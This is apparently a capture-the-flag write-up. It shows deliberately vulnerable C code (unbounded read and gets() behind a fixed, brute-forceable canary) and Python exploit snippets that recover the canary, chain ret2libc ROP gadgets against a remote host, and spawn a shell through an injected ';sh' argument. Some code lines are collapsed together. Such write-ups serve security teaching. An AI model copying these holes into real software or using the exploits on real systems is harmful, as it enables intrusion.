og_bars is used as the static canary in this challenge,
/* Reference value that read_og_bars() loads from og_bars.txt and that the
 * challenge uses as its "static canary": rap_battle() copies it onto the
 * stack and later memcmp()s the copy against it. Being a global filled from a
 * file, it holds the same bytes on every run rather than a per-process random
 * value, which is the property the writeup below relies on. */
char og_bars[BAR_SIZE];
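/*
 * Load the reference "canary" bytes from og_bars.txt into the global og_bars.
 *
 * Exits the process when the file cannot be opened or does not provide a full
 * BAR_SIZE bytes. The original code ignored fread()'s return value, so a short
 * or unreadable file would leave the unread tail of og_bars at its zero
 * initial value and the later memcmp check would silently compare against a
 * value other than the intended one.
 */
void read_og_bars(void){
    FILE *f = fopen("og_bars.txt", "r");
    if(f == NULL){
        printf("The OG bars are missing, either run the binary on the server or contact admin.\n");
        exit(0);
    }
    /* fread() may return fewer than BAR_SIZE items on a short file or a read error. */
    size_t got = fread(og_bars, sizeof(char), BAR_SIZE, f);
    fclose(f);
    if(got != (size_t)BAR_SIZE){
        /* Same exit convention as the missing-file path above. */
        printf("The OG bars are incomplete, either run the binary on the server or contact admin.\n");
        exit(0);
    }
}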
and "*** Stack Smashing Detected ***" will be triggered when the stack copy (`bars`) no longer matches `og_bars`.
/* Hand-rolled canary check (excerpt of rap_battle): a plain content comparison
 * of the stack copy against the global reference. It only fires when the bytes
 * differ, so a write that leaves the same BAR_SIZE bytes in place is not
 * detected. */
if(memcmp(bars, og_bars, BAR_SIZE)){
    printf("*** Stack Smashing Detected ***: The og bars were tampered with.\n");
    exit(-1);
}
NOTE: "Stack Smashing Detected" will NOT be triggered if the overwrite puts the correct value back into `bars`, because only the final contents are compared.
/*
 * Interactive prompt: copies the global og_bars onto the stack, reads a
 * user-supplied length and then user-supplied data, and finally compares the
 * stack copy against og_bars as a hand-rolled stack-smashing check.
 *
 * Weaknesses visible in this function (the challenge's intended ones):
 *  - count comes straight from sscanf on user input and is never bounded or
 *    checked, so read(0, buf, count) is not tied to sizeof buf at all.
 *  - gets(buf) has no length limit (gets was removed from the language in C11).
 *  - The memcmp runs only after both reads and compares contents rather than
 *    detecting a write, so an overwrite that restores the original bytes
 *    passes. og_bars is a fixed value loaded from a file, not a per-process
 *    random canary, so it does not change between runs.
 */
void rap_battle(){
    char bars[BAR_SIZE];
    char buf[MAXLEN];
    char bar_len[MAXLEN];
    int count, x=0;   /* count stays uninitialized if sscanf below matches nothing */

    /* Stack copy of the reference value; this is what the final memcmp inspects. */
    memcpy(bars, og_bars, BAR_SIZE);
    puts("Can you defeat bobby in a rap battle?\n");
    printf("What's the size of your bars?\n");
    /* Read the length one byte at a time, stopping at a newline or after
     * MAXLEN bytes. Nothing writes a NUL terminator into bar_len, so sscanf
     * depends on whatever follows the digits. */
    while(x<MAXLEN){
        read(0, bar_len+x, 1);
        if (bar_len[x] == '\n') break;
        x++;
    }
    /* No range check: negative or oversized values reach read() unchanged. */
    sscanf(bar_len, "%d", &count);
    puts("Spit your bars here: ");
    read(0, buf, count);   /* user-chosen length, unrelated to sizeof buf */
    gets(buf);             /* unbounded read */
    /* Hand-rolled canary check: content comparison only, see notes above. */
    if(memcmp(bars, og_bars, BAR_SIZE)){
        printf("*** Stack Smashing Detected ***: The og bars were tampered with.\n");
        exit(-1);
    }
    fflush(stdout);
}
Solution
Since `count` is taken from our own input, `read(0, buf, count)` can be used to brute-force the static canary.
# p = process(local_file) p = remote('35.238.225.156',1002)
payload = 'A'*36+og_bar+c sla('What\'s the size of your bars?\n',str(len(payload))) sea('Spit your bars here: \n',payload) sl('') try: data = rc() print data p.close() return-1 except Exception as e: print'good' p.close() return c
# Driver for the byte-at-a-time recovery. An already-known prefix can be passed
# as argv[1] to resume. bf() (defined earlier in the script) returns -1 for a
# rejected guess and the candidate byte otherwise. The oracle only exists because
# og_bars is a fixed value loaded from a file: a canary randomized per process
# would not be stable across the repeated connections this loop makes.
og_bar = ''
if(len(argv)>1):
    og_bar = argv[1]
# Candidate alphabet: printable ASCII plus newline.
table = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\n'
while len(og_bar)<=8:
    for c in table:
        res = bf(og_bar,c)
        print 'trying', og_bar+c
        if res != -1:
            # Accepted: extend the known prefix and start on the next byte.
            og_bar += c
            break
# pause()
print 'og_bar:', og_bar
Once the canary is known, the rest is a standard ret2libc.
# leak libc and back to main payload = 'A'*36+'-V1p3R_$' sla('What\'s the size of your bars?\n',str(len(payload))) sea('Spit your bars here: \n',payload) debug() payload += cyclic(12) payload += p64(prdi) + p64(elf.got['fopen']) payload += p64(elf.sym['puts']) payload += p64(main) sl(payload)
# one gadget payload = 'A'*36+'-V1p3R_$' sla('What\'s the size of your bars?\n',str(len(payload))) sea('Spit your bars here: \n',payload) payload += cyclic(12) payload += p64(libcbase+og[0]) sl(payload)
% nc 35.238.225.156 1004 (list_me_like_crazy) Is this lsass I dont understand :) Give me your arguments: ;sh Result: ls ;sh: flag.txt lsass cat flag.txt b00t2root{R0p_cHa1nS_ar3_tH3_b3st}